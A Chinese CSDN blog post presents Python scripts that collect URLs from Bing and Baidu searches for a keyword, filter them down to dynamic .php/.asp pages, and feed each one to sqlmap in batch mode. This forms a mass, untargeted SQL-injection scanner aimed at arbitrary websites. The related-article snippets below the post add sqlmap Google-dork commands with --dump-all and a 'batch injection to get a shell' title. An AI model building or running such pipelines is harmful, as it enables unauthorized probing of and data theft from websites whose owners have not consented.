python注入点查找_利用Python脚本通过搜索引擎批量寻找利用注入点

最新推荐文章于 2023-04-29 16:32:17 发布
最新推荐文章于 2023-04-29 16:32:17 发布
阅读量200 收藏
点赞数
文章标签: python注入点查找
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39857876/article/details/111811545
版权

思路 :

利用现有的搜索引擎API以及GoogleHacking技术 , 批量进行关键字查询和注入点检测

分为三步 :

URL采集

对采集到的不可能的URL进行过滤 , 例如静态的页面等

注入点检测

参考资料 :

实现 :

URL采集 :

利用Bing提供的免费API , 进行URL采集 : (Bing.py)

#!/usr/bin/env python

#coding:utf8

import requests

import json

import sys

# config-start

BingKey = "" # config your bing Ocp-Apim-Subscription-Key

Keyword = "简书"

maxPageNumber = 10

pageSize = 10

# config-end

url = "https://api.cognitive.microsoft.com/bing/v5.0/search?q=" + Keyword

headers = {

'Host':'api.cognitive.microsoft.com',

'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0',

'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',

'Accept-Language':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',

'Accept-Encoding':'gzip, deflate, br',

'Ocp-Apim-Subscription-Key':BingKey,

'Upgrade-Insecure-Requests':'1',

'Referer':'https://api.cognitive.microsoft.com/bing/v5.0/search?q=opensns',

'Connection':'keep-alive',

}

for i in range(maxPageNumber):

tempUrl = url + "&offset=" + str(i * pageSize) + "&count=" + str(pageSize)

response = requests.get(tempUrl, headers=headers)

content = response.text

jsonObject = json.loads(content)

results = jsonObject['webPages']['value']

for result in results:

resulturl = result['displayUrl']

if resulturl.startswith("https://"):

print resulturl

else:

print "http://" + resulturl

利用开源HTML解析库对百度搜索结果页面进行解析 , 采集URL : (Baidu.py)

#!/usr/bin/env python

#coding:utf8

import requests

from bs4 import BeautifulSoup

import sys

# config-start

keyword = "简书"

# config-end

url = "http://www.baidu.com/s?wd=" + keyword

response = requests.get(url)

content = response.content

status_code = response.status_code

soup = BeautifulSoup(content, "html.parser")

links = soup.findAll("a")

for link in links:

try:

dstURL = link['href']

if (dstURL.startswith("http://") or dstURL.startswith("https://")) and dstURL.startswith("http://www.baidu.com/link?url=") :

result_url = requests.get(dstURL).url

print result_url

except Exception as e:

continue

对静态页面等URL进行过滤

#!/usr/bin/env python

#coding:utf8

file = open("urls.txt","r")

for line in file:

content = line[0:-1]

if content.endswith("html"):

continue

if content.endswith("htm"):

continue

if ".php" in content or ".asp" in content:

print content

检测注入点 :

#!/usr/bin/env python

#coding:utf8

import os

import sys

file = open(sys.argv[1],"r")

for line in file:

url = line[0:-1]

print "*******************"

command = "sqlmap.py -u " + url + " --random-agent -f --batch --answer=\"extending=N,follow=N,keep=N,exploit=n\""

print "Exec : " + command

os.system(command)

weixin_39857876
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
百度批量注入拿shell
05-22
百度批量注入拿shell
python注入查找_python注入查找工具
weixin_28882103的博客
01-14 128
python SQL Injection Scaner 转摘至http://www.doczj.com/doc/4ee2826caaea998fcc220e89.html/pythonfocus?checked=true#!/usr/bin/python#-*-coding=utf-8-*-#Author:@xfk#blog:@http://www.doczj.com/doc/4ee2826caa...
python注入
lucyxu107的博客
02-15 1422
1. "{A}".format(A ="lala")填充 2. "0.system".format(os)找到一个属性 3.f字符串a = "Hello"                b = f"{a} World"
利用Python脚本通过搜索引擎批量寻找利用注入
weixin_34177064的博客
08-09 368
利用现有的搜索引擎API以及GoogleHacking技术 , 批量进行关键字查询和注入检测分为三步 :URL采集对采集到的不可能的URL进行过滤 , 例如静态的页面等注入检测参考资料 :Google HackingBing Web Search API实现 :URL采集 :利用Bing提供的免费API , 进行URL采集 : (Bing.py)#!/usr/bin/en...
SQL住入原始脚本_SQL注入python脚本_
10-03
标题中的“SQL住入原始脚本”指的是利用SQL注入技术来编写或执行的原始SQL命令,而“SQL注入python脚本”则表明我们将探讨如何使用Python编写脚本来自动化这一过程。 SQL注入攻击主要有三种类型:直列注入、延时...
抓取Bing 搜索引擎的搜索结果的python 脚本
最新发布
02-25
总之,通过Python编写Bing搜索引擎的搜索结果抓取脚本,涉及到了网络请求、HTML解析、反爬策略、爬虫框架以及可能的人工智能应用等多个IT领域的知识。通过实践,不仅可以提升编程技能,还能对互联网数据有更深入的...
Python爬虫实例_利用百度地图API批量获取城市所有的POI
12-23
上篇关于爬虫的文章,我们讲解了如何运用Python的requests及BeautifuiSoup模块来完成静态网页的爬取,总结过程,网页爬虫本质就两步: 1、设置请求参数(url,headers,cookies,post或get验证等)访问目标站的...
web_scan_code.zip_python_sql injection_sql注入_web scan_webscan
07-15
实现对网页的试错,判断后台数据库类型以及是否存在SQL注入的可能
注入之Google搜索(附关键字)
security.blog.cndn.net
03-11 2635
利用Google Dorks字符串找到可注入的网站 sqlmap.py -g(g即为谷歌的意思) 加上搜索引擎的语言(即google关键字) 使用示例: 1. sqlmap.py -g "inurl:php?id=" 2. sqlmap.py -g "inurl:php?id=" --dump-all --batch google搜索注入 自动跑出所有字段 部分...
注入批量扫描工具-2018
04-28
傀儡注入批量扫描工具-2018,上传于2018年4月28日。
注入批量扫描工具V5.2
12-26
注入批量扫描工具V5.2
傀儡SQL注入+URL采集器.zip
04-26
URL采集器,可以根据关键词采集,SQL注入器,傻瓜式找注入,仅供学习使用,不能用于非法用途,大家可以根据需要下载
MyBatis批量注入
qq_44295118的博客
03-10 198
方式一 上述方式相当语句逐条INSERT语句执行,将出现如下问题: mapper接口的add方法返回值将是最一条INSERT语句的操作成功的记录数目(就是0或1),而不是所有INSERT语句的操作成功的总记录数目 当其中一条不成功时,不会进行整体回滚。 方式二(mysql) (oracle) ...
python注入查找_sqlmap常用注入检测&爆破命令
weixin_28933179的博客
01-14 220
1、检测注入是否可用python sqlmap.py -u "url"2、从目标url爆破所有数据库名python sqlmap.py -u "url" --dbs3、从目标url爆破当前数据库名python sqlmap.py -u "url" --current-dbs4、列出数据库所有用户python sqlmap.py -u "url" --users5、列出数据库账户密码python ...
注入查找工具黑客python
blotemj.blog.csdn.net
07-05 1744
python SQL Injection Scaner #!/usr/bin/python #-*-coding=utf-8-*- #Example site:@http://www.apostilando.com/pagina.php?cod=1 #将要扫描的网站写入当前目录文件中。python xxx.py xxx.txt import urllib import os impor...
SQL注入基础
m0_73477772的博客
04-29 2022
SQL注入基础
SQL注入注入找法
m0_67390969的博客
07-28 1777
2,交互一般是搜索栏、留言版、登入/注册页面、以及最利于观察的搜索栏的地址如果类似于http//www.xxx.com/index.phpid=1这种很大程度存在注入当然有些注入不会这么一眼看出会有些比较复杂例如http//www.xxx.com50006/index.phpx=home&c=View&a=index&aid=9这样的地址其实也可能存在注入。1,注入首先观察搜索框的地址是否是有与数据库交互,例如html这种几乎是不存在注入的所以要先判断是否有交互。...
SQL注入盲注基础
m0_62177883的博客
07-26 1880
如下,就取出了username下的全部数据内容这里,可以在2的位置写上username,3的位置写上password,就可以的到全部数据?指在SQL注入的过程中,找到注入后,执行SQL语句后,选择的数据或者错误信息不能回显到前端页面。这里需要利用一些方法进行判断或者猜测,这个过程称之为盲注。第八关就用到盲注的方法。因为当输入?id=1时,出现的是只有两种显示,输入正确的语句,就显示youarein......,输入错误的东西,就不显示内容。.....................
利用python语言编写一个判别DVWA中SQL注入题目有没有注入
07-13
当检测DVWA中的SQL注入漏洞时,可以使用Python编写一个脚本来判断是否存在注入。以下是一个简单的示例: ```python import requests def check_sqli_vulnerability(url): payload = "'" response = requests.get(url + "?id=" + payload) if "error" in response.text: print("SQL Injection vulnerability detected!") else: print("No SQL Injection vulnerability detected.") # 示例DVWA页面的URL url = "http://localhost/DVWA-master/vulnerabilities/sqli/" # 调用函数检测漏洞 check_sqli_vulnerability(url) ``` 在上面的代码中,我们使用requests库发送一个GET请求,并在URL的参数中添加一个简单的SQL注入负载(')。然后,我们检查响应文本中是否包含了"error"这个关键词,如果存在,则说明存在SQL注入漏洞。 请注意,这只是一个简单的示例,实际上,检测SQL注入漏洞可能需要更复杂和细致的方法。因此,建议在实际应用中使用更全面和可靠的工具来进行漏洞扫描和安全测试。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值